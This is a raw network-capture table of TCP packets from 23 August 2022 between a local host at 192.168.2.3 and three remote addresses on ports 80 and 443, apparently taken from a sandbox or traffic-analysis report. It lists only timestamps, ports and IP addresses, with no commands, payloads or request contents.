Aug 23, 2022 03:42:58.280633926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.280669928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.280745029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.336355925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.336704016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:00.116744995 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.116772890 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.117357016 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.117594957 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.120784044 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.156430006 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.156492949 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.156547070 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.156583071 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.156630993 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.156640053 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.156794071 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.337430000 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:43:00.337465048 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:43:00.368653059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.389875889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:00.390033960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:00.406101942 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.406250000 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.410008907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.424133062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:00.424168110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:00.424196959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:00.424222946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:00.447561979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.486466885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.486630917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.492198944 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.529772043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.529958963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530003071 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530045033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530085087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530103922 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.530126095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530143976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.530168056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530174017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.530208111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530225992 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.530249119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530288935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530302048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.530329943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.530385017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.567873955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.567928076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.567970037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.567984104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568027973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568046093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568058014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568069935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568078995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568119049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568161964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568203926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568243980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568249941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568279028 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568283081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568284988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568290949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568308115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568336010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568370104 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568377018 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568383932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568417072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568455935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568456888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568500042 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568541050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568547964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568557978 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568562984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568582058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568622112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568631887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568643093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568661928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568681002 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568701982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.568712950 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.568754911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.606342077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.606395960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.606435061 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.606462955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.606476068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.606503963 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.606517076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.606553078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.607839108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.607883930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.607923985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.607963085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.607964039 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.608007908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.608031034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610238075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610279083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610317945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610359907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610399008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610466003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610536098 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610544920 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610549927 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610554934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610569000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610611916 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610642910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610702038 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.610917091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.610977888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611007929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611082077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611130953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611205101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611227989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611287117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611289978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611296892 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611362934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611453056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611504078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611567974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611598015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611630917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611675024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611732960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611766100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611790895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611792088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611826897 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611849070 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.611859083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611907005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611946106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611984968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.611987114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612027884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612035990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612050056 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612068892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612093925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612109900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612135887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612152100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612191916 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612214088 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612235069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612274885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612299919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612313986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.612374067 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.612387896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.643970966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644001961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644026995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644089937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.644134998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644140005 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.644193888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.644231081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644321918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644361973 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.644382954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644387960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.644449949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.644484997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.644561052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.645288944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645313978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645339012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645344019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.645366907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.645405054 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.645407915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645437002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645456076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645481110 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645502090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.645508051 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.645570040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.645574093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.647907019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.647985935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648015022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648046970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648060083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648097992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648111105 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648152113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648211002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648237944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648287058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648292065 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648309946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648320913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648339033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648375988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648380995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648408890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648432016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648454905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648483992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648529053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648555994 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648581982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648582935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648623943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648636103 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648696899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648731947 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648740053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648760080 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648834944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648875952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.648884058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.648961067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649012089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649528027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649554014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649590969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649599075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649605989 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649646044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649661064 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649672985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649717093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649727106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649763107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649802923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649816990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649832010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649864912 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649878025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649903059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649914980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649930000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649935961 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649959087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649974108 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.649986029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.649996042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650002003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650032043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650039911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650060892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650105000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650114059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650199890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650227070 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650252104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650257111 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650275946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650279045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650295019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650306940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650324106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650351048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650368929 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650396109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650415897 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650423050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650444031 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650464058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650486946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650516987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650558949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650597095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650655985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650701046 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650702000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650741100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650799036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650825977 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650871038 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.650918007 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650947094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.650995016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651082993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651110888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651139021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651176929 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651186943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651225090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651360989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651398897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651416063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651426077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651452065 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651474953 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651479006 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651508093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651529074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651535988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.651592016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.651663065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.681849957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.681900978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.681942940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.681960106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.681986094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682002068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682028055 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682032108 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682069063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682111025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682116985 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682151079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682192087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682231903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682270050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682310104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682311058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682337999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682343960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682347059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682358027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682363987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682395935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682400942 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682409048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.682446003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.682487011 CEST	80	49812	135.181.104.248	192.168.2.3
